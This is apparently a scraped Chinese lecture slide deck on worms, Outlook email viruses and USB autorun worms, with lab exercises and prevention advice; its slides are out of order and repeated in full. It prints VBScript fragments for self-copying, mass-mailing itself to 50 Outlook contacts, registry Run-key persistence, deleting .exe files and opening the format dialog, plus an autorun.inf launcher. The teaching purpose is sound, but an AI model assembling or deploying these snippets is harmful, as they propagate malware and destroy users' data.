第9章 新型计算机病毒
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
计 算 机 工 程 系
电子邮件型病毒的传播原理
自我复制
• Set fso=CreateObject("Scripting.FileSystemObject") • fso.GetFile(WScript.ScriptFullName).Copy("C:\temp. vbs")
这么两行代码就可以将自身复制到c盘根目录下 temp.vbs这个文件。
计 算 机 工 程 系
3. 防范方案:
• (1)手工清除。按照上面的行为分析,终止并删除 相关进程文件,修复注册表。
• (2)用户可以避免接收MSN上发来的陌生附件,包 括扩展名为EXE或SCR等的附件,来预防该蠕虫。
计 算 机 工 程 系
如何防范蠕虫
预防第一
工具保护 定期扫描你的系统 更新你的防病毒软件 不要轻易执行附件中的EXE和COM等可执行程序
1 蠕虫病毒
蠕虫这个名词的由来是在1982年,Shock和 Hupp根据《The Shockwave Rider》一书中的概 念提出了一种“蠕虫(Worm)”程序的思想。 蠕虫(Worm)是病毒的一种,它的传播通常不 需要所谓的激活。它通过分布式网络来散播特定 的信息或错误,进而造成网络服务遭到拒绝并发 生死锁。 具有病毒共性:如传播性、隐蔽性、破坏性等 独有的性质:不利用文件寄生,对网络造成拒绝 服务,以及和黑客技术相结合等
计 算 机 工 程 系
两类: • 一种是面向企业用户和局域网而言,这种病毒利用系统漏洞,主 动进行攻击,可以对整个互联网可造成瘫痪性的后果。以“红色 代码”、“尼姆达”以及最新的“SQL蠕虫王”为代表。 • 另外一种是针对个人用户的,通过网络(主要是电子邮件、恶意 网页形式)迅速传播的蠕虫病毒,以爱虫病毒、求职信病毒为代 表。 和普通病毒的区别:
计 算 机 工 程 系
传播——电子邮件病毒是通过电子邮件传播的。
• • • • • • • • • • • Set ola=CreateObject("Outlook.Application") On Error Resume Next For x=1 To 50 Set Mail=ola.CreateItem(0) Mail.to=ola.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) Mail.Subject="Betreff der E-Mail" Mail.Body="Text der E-Mail" Mail.Attachments.Add("C:\temp.vbs") Mail.Send Next ola.Quit
写注册表(写入字符串“TestValue”)
计 算 机 工 程 系
电子邮件型病毒预防
第一,不要轻易打开陌生人来信中的附件文件。 第二,对于比较熟悉的朋友们寄来的信件, 也要注意其 附件。 第三,切忌盲目转发。 第四,去掉Windows脚本执行功能,禁止VBS文件执行。 第五,不要隐藏系统中已知文件类型的扩展名称。 第六,将系统的网络连接的安全级别设置至少为“中 等” . 第七,利用工具。
计 算 机 工 程 系
(2)将自身加入到注册表启动项目保证自身在系统重启 动后被加载:
• • • • 位置:Software\Microsoft\Windows\CurrentVersion\Run 键名:win32 键值:winhost.exe 位置: Software\Microsoft\Windows\CurrentVersion\RunServices • 键名:win32 • 键值: winhost.exe
计 算 机 工 程 系
邮件型病毒实验(实验十三)
【实验目的】
• 掌握邮件型病毒基本原理
【实验平台】
• Windows XP操作系统 • Outlook邮件客户端
计 算 机 工 程 系
Βιβλιοθήκη Baidu
蠕虫病毒实例
MSN蠕虫病毒
1. 基本特征:
• 名称:IM-Worm.Win32.Webcam.a • 原始大小:188,928字节 • 压缩形式:PESpin • 编写语言:Microsoft Visual Basic 6.0 • 文件名称:LMAO.pif,LOL.scr,naked_drunk.pif等。
计 算 机 工 程 系
‘调整脚本语言的超时设置。 dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\W indows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if
不要轻易打开附件中的文档文件
计 算 机 工 程 系
不要直接运行附件
邮件程序设置 谨用预览功能 卸载Scripting Host 警惕发送出去的邮件
计 算 机 工 程 系
基于U盘传播的蠕虫病毒实验(实验十二)
【实验目的】
理解U盘蠕虫病毒的传染原理。 【实验环境】 VMWare Workstation 5.5.3 Windows XP sp2
6.插入干净的U盘,观察U盘是否被感染。
【注意事项】 实验前,请关闭杀毒软件。否则病毒样本会被自 动杀除。 请注意操作系统的版本。Win XP Sp2及以下版 本都适用。
计 算 机 工 程 系
2 利用Outlook漏洞编写病毒
电子邮件成为新型病毒的重要载体
利用Outlook漏洞传播的病毒:
• “爱虫(ILoveYou)” • “美丽杀(Melissa)”---宏病毒 • “库尔尼科娃” • “主页(HomePage)” • “欢乐时光(HappyTime)”
计 算 机 工 程 系
破坏性语句
打开磁盘格式化窗口
• • Set obj = Wscript.CreateObject(“Wscript.Shell”) Obj.Run “rundll32.exe shell32.dll, SHFormatDrive”
打开Windows关闭窗口
•
• •
Set obj = Wscript.CreateObject(“Wscript.Application”)
计算机病毒技术特征
计算机工程系 陈春燕
本章目标
掌握蠕虫病毒技术
掌握Outlook漏洞病毒 掌握Webpage恶意代码 了解流氓软件、僵尸病毒和RootKit病毒
计 算 机 工 程 系
主要内容
蠕虫病毒 利用Outlook漏洞编写病毒 Webpage中的恶意代码 流氓软件
僵尸网络
RootKit病毒
计 算 机 工 程 系
Obj.ShutdownWindows Set obj = Wscript.CreateObject(“Wscript.Shell”)
删除当前目录中所有的.exe文件
•
• •
Obj.Run(“Command.com /C DEL *.EXE, 0, False”)
Set obj = Wscript.CreateObject(“Wscript.Shell”) Obj.RegWrite “HKey_Local_Machine\Software\Microsoft”, “TestValue”
计 算 机 工 程 系
4.查看autorun.inf文件内容。其内容如下:
[AutoRun] open=uvirus.exe shellexecute=uvirus.exe shell\auto\command=uvirus.exe
计 算 机 工 程 系
5.观察病毒触发后的效果。如图所示。
计 算 机 工 程 系
计 算 机 工 程 系
(3)蠕虫病毒会在C盘根目录 生成一个图片文件,名字为 sexy.jpg,并调用jpg关联程序 打开该图片。一般情况下,会 用IE打开该图片,打开后效果如 下图。 (4)开启本地 TCP10xx端口, 频繁连接目标: 10.0.1.128:8080,接受黑客控 制。 (5)查找MSN窗口,如果存在, 则向好友列表中发送消息传播 自身。
计 算 机 工 程 系
邮件病毒分类
附件方式:病毒的主要部分就隐藏在附件中。 • “主页(HomePage)”和“爱虫(ILoveYou)”病毒, 它们的附件是VBS文件,也就是病毒关键部分。 邮件本身:病毒并不置身于附件,而是藏身于邮件体之 中。 • “欢乐时光(HappyTime)”病毒就是藏身于邮件体 中,一旦用户将鼠标移至带毒邮件上,还未阅读邮件 就已经中毒了。 嵌入方式:病毒仅仅把电子邮件作为其传播手段。 • “美丽杀(Melissa)”是一种隐蔽性、传播性极大的 Word 97/2K宏病毒。尽管其核心内容是宏病毒,但在 病毒体内有一块代码专门用来传播。当条件符合时, 打开用户的电子邮件地址,向前50个地址发送被感染 的邮件。
计 算 机 工 程 系
2.行为分析:
• (1)蠕虫运行后,将释放一个名为 CZ.EXE 文件到 C盘根目录,并将它拷贝到%system%目录下,文件 名为winhost.exe。然后,将文件属性设置为隐藏、只 读、系统,同时将该文件创建时间改成同系统文件日 期一样,进行欺骗迷惑。同时蠕虫会在C盘跟目录随 机生成一个文件,扩展名为PIF或EXE等,该文件用 来向MSN好友传播。此外,病毒还会在%system%目 录下生成msnus.exe,该文件为蠕虫自身拷贝。
计 算 机 工 程 系
’修改注册表,使得每次系统启动时自动执行脚本 regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Window s\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKer nel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Window s\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win 32DLL.vbs" „MSKernel32.vbs和Win32DLL.vbs是病毒脚本的一个副 本
计 算 机 工 程 系
实验步骤
1.实验素材:在附书资源 目录experments\wormu下。 2.检查干净的电脑各分区 的是否存在autorun.inf和病 毒文件virus.exe(需要设置 显示隐藏文件和系统文件等 选项)。 3.插入含有病毒的U盘,U 盘的右键菜单出现“auto”后, 双击u盘,观察现在各分区 的情况(如图)。
计 算 机 工 程 系
蠕虫病毒的机理
蠕虫病毒由两部分组成:一个主程序和另一个是 引导程序。
• 主程序收集与当前机器联网的其他机器的信息。利用 漏洞在远程机上建立引导程序。 • 引导程序把“蠕虫”病毒带入了它所感染的每一台机 器中。
当前流行的病毒主要采用一些已公开漏洞、脚本、 电子邮件等机制进行传播。例如,IRC, RPC 等 漏洞。
普通病毒 存在形式 传染机制 传染目标 寄存文件 宿主程序运行 本地文件
蠕虫 独立程序 主动攻击 网络计算机
计 算 机 工 程 系
蠕虫病毒的特性
第一,利用漏洞主动进行攻击
第二,病毒制作技术新 第三,与黑客技术相结合,潜在的威胁和损失更大
第四,传染方式多
第五,传播速度快 第六,清除难度大 第七,破坏性强
计 算 机 工 程 系
【病毒原理】 U盘病毒通常都是通过给u盘创建autorun.inf文件,利用 Windows系统的自动播放功能来触发病毒程序,从而达 到传染和破坏的目的。 Autorun.inf文件可以通过以下命令来运行病毒程序 Open=Virus.exe 指定设备启用时运行Virus.exe。 ShellExecute=Virus.exe 设备启用时执行文件Virus.exe。 Shell\XXX\command=Virus.exe 当用户在右键菜单中点击XXX时,运行Virus.exe
电子邮件型病毒的传播原理
自我复制
• Set fso=CreateObject("Scripting.FileSystemObject") • fso.GetFile(WScript.ScriptFullName).Copy("C:\temp. vbs")
这么两行代码就可以将自身复制到c盘根目录下 temp.vbs这个文件。
计 算 机 工 程 系
3. 防范方案:
• (1)手工清除。按照上面的行为分析,终止并删除 相关进程文件,修复注册表。
• (2)用户可以避免接收MSN上发来的陌生附件,包 括扩展名为EXE或SCR等的附件,来预防该蠕虫。
计 算 机 工 程 系
如何防范蠕虫
预防第一
工具保护 定期扫描你的系统 更新你的防病毒软件 不要轻易执行附件中的EXE和COM等可执行程序
1 蠕虫病毒
蠕虫这个名词的由来是在1982年,Shock和 Hupp根据《The Shockwave Rider》一书中的概 念提出了一种“蠕虫(Worm)”程序的思想。 蠕虫(Worm)是病毒的一种,它的传播通常不 需要所谓的激活。它通过分布式网络来散播特定 的信息或错误,进而造成网络服务遭到拒绝并发 生死锁。 具有病毒共性:如传播性、隐蔽性、破坏性等 独有的性质:不利用文件寄生,对网络造成拒绝 服务,以及和黑客技术相结合等
计 算 机 工 程 系
两类: • 一种是面向企业用户和局域网而言,这种病毒利用系统漏洞,主 动进行攻击,可以对整个互联网可造成瘫痪性的后果。以“红色 代码”、“尼姆达”以及最新的“SQL蠕虫王”为代表。 • 另外一种是针对个人用户的,通过网络(主要是电子邮件、恶意 网页形式)迅速传播的蠕虫病毒,以爱虫病毒、求职信病毒为代 表。 和普通病毒的区别:
计 算 机 工 程 系
传播——电子邮件病毒是通过电子邮件传播的。
• • • • • • • • • • • Set ola=CreateObject("Outlook.Application") On Error Resume Next For x=1 To 50 Set Mail=ola.CreateItem(0) Mail.to=ola.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) Mail.Subject="Betreff der E-Mail" Mail.Body="Text der E-Mail" Mail.Attachments.Add("C:\temp.vbs") Mail.Send Next ola.Quit
写注册表(写入字符串“TestValue”)
计 算 机 工 程 系
电子邮件型病毒预防
第一,不要轻易打开陌生人来信中的附件文件。 第二,对于比较熟悉的朋友们寄来的信件, 也要注意其 附件。 第三,切忌盲目转发。 第四,去掉Windows脚本执行功能,禁止VBS文件执行。 第五,不要隐藏系统中已知文件类型的扩展名称。 第六,将系统的网络连接的安全级别设置至少为“中 等” . 第七,利用工具。
计 算 机 工 程 系
(2)将自身加入到注册表启动项目保证自身在系统重启 动后被加载:
• • • • 位置:Software\Microsoft\Windows\CurrentVersion\Run 键名:win32 键值:winhost.exe 位置: Software\Microsoft\Windows\CurrentVersion\RunServices • 键名:win32 • 键值: winhost.exe
计 算 机 工 程 系
邮件型病毒实验(实验十三)
【实验目的】
• 掌握邮件型病毒基本原理
【实验平台】
• Windows XP操作系统 • Outlook邮件客户端
计 算 机 工 程 系
Βιβλιοθήκη Baidu
蠕虫病毒实例
MSN蠕虫病毒
1. 基本特征:
• 名称:IM-Worm.Win32.Webcam.a • 原始大小:188,928字节 • 压缩形式:PESpin • 编写语言:Microsoft Visual Basic 6.0 • 文件名称:LMAO.pif,LOL.scr,naked_drunk.pif等。
计 算 机 工 程 系
‘调整脚本语言的超时设置。 dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\W indows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if
不要轻易打开附件中的文档文件
计 算 机 工 程 系
不要直接运行附件
邮件程序设置 谨用预览功能 卸载Scripting Host 警惕发送出去的邮件
计 算 机 工 程 系
基于U盘传播的蠕虫病毒实验(实验十二)
【实验目的】
理解U盘蠕虫病毒的传染原理。 【实验环境】 VMWare Workstation 5.5.3 Windows XP sp2
6.插入干净的U盘,观察U盘是否被感染。
【注意事项】 实验前,请关闭杀毒软件。否则病毒样本会被自 动杀除。 请注意操作系统的版本。Win XP Sp2及以下版 本都适用。
计 算 机 工 程 系
2 利用Outlook漏洞编写病毒
电子邮件成为新型病毒的重要载体
利用Outlook漏洞传播的病毒:
• “爱虫(ILoveYou)” • “美丽杀(Melissa)”---宏病毒 • “库尔尼科娃” • “主页(HomePage)” • “欢乐时光(HappyTime)”
计 算 机 工 程 系
破坏性语句
打开磁盘格式化窗口
• • Set obj = Wscript.CreateObject(“Wscript.Shell”) Obj.Run “rundll32.exe shell32.dll, SHFormatDrive”
打开Windows关闭窗口
•
• •
Set obj = Wscript.CreateObject(“Wscript.Application”)
计算机病毒技术特征
计算机工程系 陈春燕
本章目标
掌握蠕虫病毒技术
掌握Outlook漏洞病毒 掌握Webpage恶意代码 了解流氓软件、僵尸病毒和RootKit病毒
计 算 机 工 程 系
主要内容
蠕虫病毒 利用Outlook漏洞编写病毒 Webpage中的恶意代码 流氓软件
僵尸网络
RootKit病毒
计 算 机 工 程 系
Obj.ShutdownWindows Set obj = Wscript.CreateObject(“Wscript.Shell”)
删除当前目录中所有的.exe文件
•
• •
Obj.Run(“Command.com /C DEL *.EXE, 0, False”)
Set obj = Wscript.CreateObject(“Wscript.Shell”) Obj.RegWrite “HKey_Local_Machine\Software\Microsoft”, “TestValue”
计 算 机 工 程 系
4.查看autorun.inf文件内容。其内容如下:
[AutoRun] open=uvirus.exe shellexecute=uvirus.exe shell\auto\command=uvirus.exe
计 算 机 工 程 系
5.观察病毒触发后的效果。如图所示。
计 算 机 工 程 系
计 算 机 工 程 系
(3)蠕虫病毒会在C盘根目录 生成一个图片文件,名字为 sexy.jpg,并调用jpg关联程序 打开该图片。一般情况下,会 用IE打开该图片,打开后效果如 下图。 (4)开启本地 TCP10xx端口, 频繁连接目标: 10.0.1.128:8080,接受黑客控 制。 (5)查找MSN窗口,如果存在, 则向好友列表中发送消息传播 自身。
计 算 机 工 程 系
邮件病毒分类
附件方式:病毒的主要部分就隐藏在附件中。 • “主页(HomePage)”和“爱虫(ILoveYou)”病毒, 它们的附件是VBS文件,也就是病毒关键部分。 邮件本身:病毒并不置身于附件,而是藏身于邮件体之 中。 • “欢乐时光(HappyTime)”病毒就是藏身于邮件体 中,一旦用户将鼠标移至带毒邮件上,还未阅读邮件 就已经中毒了。 嵌入方式:病毒仅仅把电子邮件作为其传播手段。 • “美丽杀(Melissa)”是一种隐蔽性、传播性极大的 Word 97/2K宏病毒。尽管其核心内容是宏病毒,但在 病毒体内有一块代码专门用来传播。当条件符合时, 打开用户的电子邮件地址,向前50个地址发送被感染 的邮件。
计 算 机 工 程 系
2.行为分析:
• (1)蠕虫运行后,将释放一个名为 CZ.EXE 文件到 C盘根目录,并将它拷贝到%system%目录下,文件 名为winhost.exe。然后,将文件属性设置为隐藏、只 读、系统,同时将该文件创建时间改成同系统文件日 期一样,进行欺骗迷惑。同时蠕虫会在C盘跟目录随 机生成一个文件,扩展名为PIF或EXE等,该文件用 来向MSN好友传播。此外,病毒还会在%system%目 录下生成msnus.exe,该文件为蠕虫自身拷贝。
计 算 机 工 程 系
’修改注册表,使得每次系统启动时自动执行脚本 regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Window s\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKer nel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Window s\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win 32DLL.vbs" „MSKernel32.vbs和Win32DLL.vbs是病毒脚本的一个副 本
计 算 机 工 程 系
实验步骤
1.实验素材:在附书资源 目录experments\wormu下。 2.检查干净的电脑各分区 的是否存在autorun.inf和病 毒文件virus.exe(需要设置 显示隐藏文件和系统文件等 选项)。 3.插入含有病毒的U盘,U 盘的右键菜单出现“auto”后, 双击u盘,观察现在各分区 的情况(如图)。
计 算 机 工 程 系
蠕虫病毒的机理
蠕虫病毒由两部分组成:一个主程序和另一个是 引导程序。
• 主程序收集与当前机器联网的其他机器的信息。利用 漏洞在远程机上建立引导程序。 • 引导程序把“蠕虫”病毒带入了它所感染的每一台机 器中。
当前流行的病毒主要采用一些已公开漏洞、脚本、 电子邮件等机制进行传播。例如,IRC, RPC 等 漏洞。
普通病毒 存在形式 传染机制 传染目标 寄存文件 宿主程序运行 本地文件
蠕虫 独立程序 主动攻击 网络计算机
计 算 机 工 程 系
蠕虫病毒的特性
第一,利用漏洞主动进行攻击
第二,病毒制作技术新 第三,与黑客技术相结合,潜在的威胁和损失更大
第四,传染方式多
第五,传播速度快 第六,清除难度大 第七,破坏性强
计 算 机 工 程 系
【病毒原理】 U盘病毒通常都是通过给u盘创建autorun.inf文件,利用 Windows系统的自动播放功能来触发病毒程序,从而达 到传染和破坏的目的。 Autorun.inf文件可以通过以下命令来运行病毒程序 Open=Virus.exe 指定设备启用时运行Virus.exe。 ShellExecute=Virus.exe 设备启用时执行文件Virus.exe。 Shell\XXX\command=Virus.exe 当用户在右键菜单中点击XXX时,运行Virus.exe